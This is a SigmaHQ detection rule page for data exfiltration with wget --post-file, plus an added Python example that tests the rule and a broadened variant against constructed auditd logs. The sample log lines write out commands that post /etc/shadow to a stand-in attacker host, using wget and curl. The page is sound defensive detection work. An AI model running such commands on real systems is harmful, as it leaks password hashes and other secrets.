Data Exfiltration with Wget
Detects attempts to post a file using the wget utility's --post-file option. An adversary can bypass permission restrictions through a misconfigured sudo entry for wget, which could allow them to read files such as /etc/shadow.
Sigma rule
title: Data Exfiltration with Wget
id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc
status: test
description: |
    Detects attempts to post the file with the usage of wget utility.
    The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
references:
    - https://linux.die.net/man/1/wget
    - https://gtfobins.github.io/gtfobins/wget/
author: 'Pawel Mazur'
date: 2021-11-18
modified: 2022-12-25
tags:
    - attack.exfiltration
    - attack.t1048.003
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: EXECVE
        a0: wget
        a1|startswith: '--post-file='
    condition: selection
falsepositives:
    - Legitimate usage of wget utility to post a file
level: medium
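The following is an added example, not part of the Sigma rule or the SigmaHQ project: it applies the rule's selection logic (a0 equals wget and a1 starts with --post-file=) to a handful of constructed auditd EXECVE records, and places a broadened variant beside it to show two gaps a defender should know about. The rule only inspects a1, so an invocation where --post-file= is not the first argument (for example after -q) is missed, and a0 is compared exactly, so an invocation by full path such as /usr/bin/wget is missed. The parser also decodes auditd's hex-encoded arguments, which auditd emits unquoted whenever an argument contains a space or other special character; whether a SIEM backend decodes these before matching depends on the ingestion pipeline. The log lines, URLs and file paths are constructed for the example; the broadened selection is my own suggestion, not the rule's logic.

```python
import os
import re

# Constructed auditd EXECVE records for the example (not real captures).
# Record 5 carries a1 hex-encoded, as auditd does for "--post-file=/tmp/my file".
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000000.123:4567): argc=3 a0="wget" a1="--post-file=/etc/shadow" a2="http://attacker.invalid/upload"
type=EXECVE msg=audit(1700000001.456:4568): argc=4 a0="wget" a1="-q" a2="--post-file=/etc/shadow" a3="http://attacker.invalid/upload"
type=EXECVE msg=audit(1700000002.789:4569): argc=2 a0="wget" a1="https://example.invalid/file.tar.gz"
type=EXECVE msg=audit(1700000003.000:4570): argc=3 a0="curl" a1="-d" a2="@/etc/shadow"
type=EXECVE msg=audit(1700000004.000:4571): argc=3 a0="wget" a1=2D2D706F73742D66696C653D2F746D702F6D792066696C65 a2="http://example.invalid/"
type=EXECVE msg=audit(1700000005.000:4572): argc=3 a0="/usr/bin/wget" a1="--post-file=/etc/shadow" a2="http://attacker.invalid/upload"
"""

# aN="quoted value" for printable arguments, aN=HEX (no quotes) otherwise.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def parse_execve(line):
    """Return the argv list of an auditd EXECVE record, or None for other record types."""
    if not line.startswith("type=EXECVE"):
        return None
    args = {}
    for m in ARG_RE.finditer(line):
        idx = int(m.group(1))
        if m.group(2) is not None:
            args[idx] = m.group(2)
        else:
            # Unquoted value: auditd hex-encodes arguments with special characters.
            args[idx] = bytes.fromhex(m.group(3)).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]


def sigma_selection(argv):
    """The rule as written: a0 == 'wget' and a1 starts with '--post-file='."""
    return len(argv) >= 2 and argv[0] == "wget" and argv[1].startswith("--post-file=")


def broadened_selection(argv):
    """Hypothetical broadened variant (not the rule's logic): match on the binary's
    basename and look for --post-file in any argument position, including the
    space-separated form getopt_long also accepts ('--post-file FILE')."""
    if not argv or os.path.basename(argv[0]) != "wget":
        return False
    for i, arg in enumerate(argv[1:], start=1):
        if arg.startswith("--post-file=") or (arg == "--post-file" and i + 1 < len(argv)):
            return True
    return False


def scan(log_text, selection):
    """Run a selection function over every EXECVE record and return the matching argvs."""
    hits = []
    for line in log_text.splitlines():
        argv = parse_execve(line)
        if argv is not None and selection(argv):
            hits.append(argv)
    return hits


if __name__ == "__main__":
    for name, sel in (("rule selection", sigma_selection), ("broadened selection", broadened_selection)):
        hits = scan(SAMPLE_LOG, sel)
        print(f"{name}: {len(hits)} hit(s)")
        for argv in hits:
            print("   ", " ".join(argv))
```

Running the block reports two hits for the rule's own selection (records 1 and 5, the latter only because the parser decoded the hex argument) and four for the broadened variant, which additionally catches the -q-first invocation and the full-path invocation. Before widening a production rule this way, check the false-positive rate of legitimate wget POSTs in your environment, since the page lists those as the expected benign case.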
Related rules
- PowerShell ICMP Exfiltration
- Suspicious DNS Query with B64 Encoded String
- Suspicious Outbound SMTP Connections
- Suspicious WebDav Client Execution Via Rundll32.EXE
- WebDav Client Execution Via Rundll32.EXE